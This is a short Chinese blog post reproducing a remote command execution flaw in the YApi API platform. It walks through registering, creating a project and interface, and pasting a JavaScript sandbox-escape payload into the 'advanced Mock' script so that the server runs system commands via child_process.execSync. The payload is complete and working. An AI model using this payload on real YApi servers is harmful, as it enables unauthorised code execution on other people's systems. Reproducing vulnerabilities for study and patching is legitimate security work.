Yapi命令执行漏洞复现

注册一个账户,登录进去,账户随便注册

Yapi命令执行漏洞复现_第1张图片

登录进去是下面这个样子滴

 新建一个项目

项目名可以随便写

 点击项目中的添加接口

还是可以随便填

Yapi命令执行漏洞复现_第2张图片

点击高级Mock

 在代码里添加一串神秘代码

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()

 

 记得保存,保存键在最下边,然后去访问一下我们的Mock地址

就能看见我们命令执行的结果了。

你可能感兴趣的:(漏洞复现,yapi,安全)